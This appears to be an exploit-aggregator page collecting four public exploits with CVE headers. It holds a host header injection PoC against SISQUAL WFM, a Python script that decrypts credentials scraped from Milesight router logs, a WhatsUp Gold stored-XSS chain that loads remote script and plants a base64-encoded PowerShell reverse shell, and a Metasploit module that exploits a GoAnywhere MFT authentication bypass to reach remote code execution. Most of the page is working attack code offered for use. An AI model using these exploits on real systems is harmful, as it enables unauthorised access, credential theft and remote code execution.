Latest exploits :: CodePwn

<pre><code># Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection # Discovered Date: 17/03/2023 # Reported Date: 17/03/2023 # Exploit Author: Omer Shaik (unknown_exploit) # Vendor Homepage: https://www.sisqualwfm.com # Version: 7.1.319.103 # Tested on: SISQUAL WFM 7.1.319.103 # Affected Version: sisqualWFM - 7.1.319.103 # Fixed Version: sisqualWFM - 7.1.319.111 # CVE : CVE-2023-36085 # CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Category: Web Apps # Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085 A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header. **************************************************************************************************** Orignal Request **************************************************************************************************** GET /sisqualIdentityServer/core/login HTTP/2 Host: sisqualwfm.cloud Cookie:<cookie> Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 **************************************************************************************************** Orignal Response **************************************************************************************************** HTTP/2 302 Found Cache-Control: no-store, no-cache, must-revalidate Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Date: Wed, 22 Mar 2023 13:22:10 GMT Content-Length: 0 **************************************************************************************************** ██████╗ ██████╗ ██████╗ ██╔══██╗██╔═══██╗██╔════╝ ██████╔╝██║ ██║██║ ██╔═══╝ ██║ ██║██║ ██║ ╚██████╔╝╚██████╗ ╚═╝ ╚═════╝ ╚═════╝ **************************************************************************************************** Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy) **************************************************************************************************** GET /sisqualIdentityServer/core/login HTTP/2 Host: evil.com Cookie:<cookie> Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 **************************************************************************************************** Response **************************************************************************************************** HTTP/2 302 Found Cache-Control: no-store, no-cache, must-revalidate Location: https://evil.com/sisqualIdentityServer/core/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 0 **************************************************************************************************** Method of Attack **************************************************************************************************** curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv **************************************************************************************************** </code></pre>

<pre><code>#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption CVE: CVE-2023-43261 Script Author: Bipin Jitiya (@win3zz) Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.) Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable. Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10 Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf """ import sys import requests import re import warnings from Crypto.Cipher import AES # pip install pycryptodome from Crypto.Util.Padding import unpad import base64 import time warnings.filterwarnings("ignore") KEY = b'1111111111111111' IV = b'2222222222222222' def decrypt_password(password): try: return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8') except ValueError as e: display_output(' [-] Error occurred during password decryption: ' + str(e), 'red') def display_output(message, color): colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'} print(f"{colors[color]}{message}{colors['end']}") time.sleep(0.5) urls = [] if len(sys.argv) == 2: urls.append(sys.argv[1]) if len(sys.argv) == 3 and sys.argv[1] == '-f': with open(sys.argv[2], 'r') as file: urls.extend(file.read().splitlines()) if len(urls) == 0: display_output('Please provide a URL or a file with a list of URLs.', 'red') display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue') display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue') sys.exit() use_proxy = False proxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else None for url in urls: display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue') response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False) if response.status_code == 200: display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green') data = response.text credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data)) num_credentials = len(credentials) display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green') if num_credentials > 0: display_output('[+] Login page: ' + url + '/login.html', 'green') display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue') display_output('[+] Unique Credentials:', 'yellow') for i, (username, password) in enumerate(credentials, start=1): display_output(f' Credential {i}:', 'cyan') decrypted_password = decrypt_password(password.encode('utf-8')) display_output(f' - Username: {username}', 'green') display_output(f' - Password: {decrypted_password}', 'green') else: display_output('[-] No credentials found in the retrieved data for: ' + url, 'red') else: display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red') </code></pre>

<pre><code># Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS) # Date: April 18, 2023 # Exploit Author: Andreas Finstad (4ndr34z) # Vendor Homepage: https://www.whatsupgold.com # Version: v.22.1.0 Build 39 # Tested on: Windows 2022 Server # CVE : CVE-2023-35759 # Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759 WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter. Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39) Product Name: WhatsUp Gold 2022 Version: 22.1.0 Build 39 Vulnerability Type: Stored Cross-Site Scripting (XSS) Description: WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions. As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3) The XSS trigger when clicking the "All names and addresses" Stage: Base64 encoded id property: var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a); Staged payload placed in the SNMP sysName Field on a device: <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))> payload: var vhost = window.location.protocol+'\/\/'+window.location.host addaction(); async function addaction() { var arguments = '' let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{ method: 'POST', headers: { 'Connection': 'close', 'Content-Length': '1902', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'sec-ch-ua-mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'sec-ch-ua-platform': '"macOS"', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include', body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}' }); setTimeout(() => { getactions(); }, 1000); }; async function getactions() { const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{ method: 'GET', headers: { 'Connection': 'close', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'sec-ch-ua-mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'sec-ch-ua-platform': '"macOS"', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include' }); const actions = await response.json(); var results = []; var searchField = "Name"; var searchVal = "Systemtask"; for (var i=0 ; i < actions.length ; i++) { if (actions[i][searchField] == searchVal) { results.push(actions[i].Id); revshell(results[0]) } } //console.log(actions); }; async function revshell(ID) { fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{ method: 'POST', headers: { 'Connection': 'close', 'Content-Length': '2442', 'Cache-Control': 'max-age=0', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"macOS"', 'Upgrade-Insecure-Requests': '1', 'Origin': 'https://192.168.16.100', 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'iframe', 'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include', body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0' }); }; </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Auxiliary::Report def initialize(info = {}) super( update_info( info, 'Name' => 'Fortra GoAnywhere MFT Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # MSF RCE Exploit 'James Horseman', # Original auth bypass PoC/Analysis 'Zach Hanley' # Original auth bypass PoC/Analysis ], 'References' => [ ['CVE', '2024-0204'], ['URL', 'https://www.fortra.com/security/advisory/fi-2024-001'], # Vendor Advisory ['URL', 'https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/'] ], 'DisclosureDate' => '2024-01-22', 'Platform' => %w[linux win], 'Arch' => [ARCH_JAVA], 'Privileged' => true, # Could be 'NT AUTHORITY\SYSTEM' on Windows, or a non-root user 'gamft' on Linux. 'Targets' => [ [ # Tested on GoAnywhere 7.4.0 with the payload java/jsp_shell_reverse_tcp 'Automatic', {} ], [ 'Linux', { 'Platform' => 'linux', 'GOANYWHERE_INSTALL_PATH' => '/opt/HelpSystems/GoAnywhere' } ], [ 'Windows', { 'Platform' => 'win', 'GOANYWHERE_INSTALL_PATH' => 'C:\\Program Files\\Fortra\\GoAnywhere\\' }, ], ], 'DefaultOptions' => { 'RPORT' => 8001, 'SSL' => true }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ IOC_IN_LOGS, # A new admin account is created, which the exploit can't destroy. CONFIG_CHANGES, # The upload may leave payload artifacts if the FileDropper mixins cleanup handlers cannot delete them. ARTIFACTS_ON_DISK ] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path to the web application', '/goanywhere/']), ] ) end def check # We can query an undocumented unauthenticated REST API endpoint and pull the version number. res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/rest/gacmd/v1/system') ) return CheckCode::Unknown('Connection failed') unless res return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200 json_data = res.get_json_document product = json_data.dig('data', 'product') version = json_data.dig('data', 'version') return CheckCode::Unknown('No version information in response') if product.nil? || version.nil? # As per the Fortra advisory, the following version are affected: # * Fortra GoAnywhere MFT 6.x from 6.0.1 # * Fortra GoAnywhere MFT 7.x before 7.4.1 # This seems to imply version 6.0.1 through to 7.4.0 (inclusive) are vulnerable. if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0')) return CheckCode::Appears("#{product} #{version}") end Exploit::CheckCode::Safe("#{product} #{version}") end def exploit # CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So # we generate the username/password pair we want to use. # Note: We cannot delete the administrator account that we create. admin_username = Rex::Text.rand_text_alpha_lower(8) admin_password = Rex::Text.rand_text_alphanumeric(16) # By using a double dot path segment with a semicolon in it, we can bypass the servers attempts to block access to # the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation. As we leverage a double # dot path segment, we need a directory to navigate down from, there are many available on the target so we pick # a random one that we know works. path_segments = %w[styles fonts auth help] path_segment = path_segments.sample # This is CVE-2024-0204... initialaccountsetup_endpoint = "/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint), 'keep_cookies' => true, 'vars_post' => { 'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint), 'j_id_u:creteAdminGrid:username' => admin_username, 'j_id_u:creteAdminGrid:password' => admin_password, 'j_id_u:creteAdminGrid:password_hinput' => admin_password, 'j_id_u:creteAdminGrid:confirmPassword' => admin_password, 'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password, 'j_id_u:creteAdminGrid:submitButton' => '', 'createAdminForm_SUBMIT' => 1 } ) # The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method # loginNewAdminUser and update our current session, so we dont need to manually login. unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml') fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}") end print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.") store_credentials(admin_username, admin_password) # Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page. if target.name == 'Automatic' res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/help/About.xhtml'), 'keep_cookies' => true ) unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'Unexpected reply 2 from About.xhtml') end # The OS name could be something like "Linux" or "Windows Server 2022". Under the hood, GoAnywhere is using # the Java system property "os.name". os_match = res.body.match(%r{(.+)}) unless os_match fail_with(Failure::UnexpectedReply, 'Did not locate OSName in About.xhtml') end # To perform the JSP payload upload, we need to know the product installation path. install_match = res.body.match(%r{(.+)}) unless install_match fail_with(Failure::UnexpectedReply, 'Did not locate goAnywhereHome in About.xhtml') end # Find the Metasploit target (Linux/Windows) via a substring of the OS name we get back from GoAnywhere. found_target = targets.find do |t| os_match[1].downcase.include? t.name.downcase end unless found_target fail_with(Failure::NoTarget, "Unable to select an automatic target for '#{os_match[1]}'") end # Dup the target we found, as we patch in the GOANYWHERE_INSTALL_PATH below. detected_target = found_target.dup detected_target.opts['GOANYWHERE_INSTALL_PATH'] = install_match[1] print_status("Automatic targeting, detected OS: #{detected_target.name}") print_status("Automatic targeting, detected install path: #{detected_target['GOANYWHERE_INSTALL_PATH']}") else detected_target = target end # We are going to upload a JSP payload via the FileManager interface. We first have to get the FileManager, then # change to the directory we want to upload to, then upload the file. path_separator = detected_target['Platform'] == 'win' ? '\\' : '/' # We drop the JSP payload to a location such as: /opt/HelpSystems/GoAnywhere/adminroot/PAYLOAD_NAME.jsp adminroot_path = detected_target['GOANYWHERE_INSTALL_PATH'] adminroot_path += path_separator unless adminroot_path.end_with? path_separator adminroot_path += 'adminroot' adminroot_path += path_separator viewstate = get_viewstate('/tools/filemanager/FileManager.xhtml') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'), 'keep_cookies' => true, 'vars_post' => { 'javax.faces.ViewState' => viewstate, 'j_id_4u:j_id_4v:newPath_focus' => '', 'j_id_4u:j_id_4v:newPath_input' => '/', 'j_id_4u:j_id_4v:newPath_editableInput' => adminroot_path, 'j_id_4u:j_id_4v:NewPathButton' => '', 'j_id_4u_SUBMIT' => 1 } ) unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'Unexpected reply 4 from FileManager.xhtml') end # We require a regID value form the page to upload a file, so we pull that out here. vs_input = res.get_html_document.at('input[name="reqId"]') unless vs_input&.key? 'value' fail_with(Failure::UnexpectedReply, 'Did not locate reqId in reply 4 from FileManager.xhtml') end request_id = vs_input['value'] res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'), 'keep_cookies' => true, 'vars_post' => { 'javax.faces.ViewState' => viewstate, 'javax.faces.partial.ajax' => 'true', 'javax.faces.source' => 'uploadID', 'javax.faces.partial.execute' => 'uploadID', 'javax.faces.partial.render' => '@none', 'uploadID' => 'uploadID', 'uploadID_sessionCheck' => 'true', 'reqId' => request_id, 'whenFileExists_focus' => '', 'whenFileExists_input' => 'rename', 'uploaderType' => 'filemanager', 'j_id_4i_SUBMIT' => 1 } ) unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'Unexpected reply 5 from FileManager.xhtml') end jsp_filename = Rex::Text.rand_text_alphanumeric(8) + '.jsp' message = Rex::MIME::Message.new message.add_part(request_id, nil, nil, 'form-data; name="reqId"') message.add_part('', nil, nil, 'form-data; name="whenFileExists_focus"') message.add_part('rename', nil, nil, 'form-data; name="whenFileExists_input"') message.add_part('filemanager', nil, nil, 'form-data; name="uploaderType"') message.add_part('1', nil, nil, 'form-data; name="j_id_4i_SUBMIT"') message.add_part(viewstate, nil, nil, 'form-data; name="javax.faces.ViewState"') message.add_part('true', nil, nil, 'form-data; name="javax.faces.partial.ajax"') message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.partial.execute"') message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.source"') message.add_part('1', nil, nil, 'form-data; name="uniqueFileUploadId"') message.add_part(payload.encoded, 'text/plain', nil, "form-data; name=\"uploadID\"; filename=\"#{jsp_filename}\"") # We can now upload our payload... res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'), 'keep_cookies' => true, 'ctype' => 'multipart/form-data; boundary=' + message.bound, 'data' => message.to_s ) unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'Unexpected reply 6 from FileManager.xhtml') end # Register our payload so it is deleted when the session is created. jsp_filepath = adminroot_path + jsp_filename print_status("Dropped payload: #{jsp_filepath}") # We are using the FileDropper mixin to automatically delete this file after a session has been created. register_file_for_cleanup(jsp_filepath) # A copy of the files this user uploads is left here: # /opt/HelpSystems/GoAnywhere/userdata/documents/ADMIN_USERNAME/PAYLOAD_NAME.jsp # We register these to be deleted, but they appear to be locked, preventing deleting. userdoc_path = detected_target['GOANYWHERE_INSTALL_PATH'] userdoc_path += path_separator unless userdoc_path.end_with? path_separator userdoc_path += 'userdata' userdoc_path += path_separator userdoc_path += 'documents' userdoc_path += path_separator userdoc_path += admin_username userdoc_path += path_separator register_file_for_cleanup(userdoc_path + jsp_filename) register_dir_for_cleanup(userdoc_path) # Finally, trigger our payload via a GET request... send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, jsp_filename) ) # NOTE: it is not possible to delete the user account we created as we cant delete ourself either via the web # interface or REST API. end # Helper method to pull out a viewstate identifier from a requests HTML response. def get_viewstate(endpoint) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, endpoint), 'keep_cookies' => true ) unless res&.code == 200 fail_with(Failure::UnexpectedReply, "Unexpected reply during get_viewstate via '#{endpoint}'.") end vs_input = res.get_html_document.at('input[name="javax.faces.ViewState"]') unless vs_input&.key? 'value' fail_with(Failure::UnexpectedReply, "Did not locate ViewState during get_viewstate via '#{endpoint}'.") end vs_input['value'] end def store_credentials(username, password) service_data = { address: datastore['RHOST'], port: datastore['RPORT'], service_name: 'GoAnywhere MFT Admin Interface', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: username, private_data: password, private_type: :password }.merge(service_data) credential_core = create_credential(credential_data) login_data = { core: credential_core, last_attempted_at: DateTime.now, status: Metasploit::Model::Login::Status::SUCCESSFUL }.merge(service_data) create_credential_login(login_data) end end </code></pre>

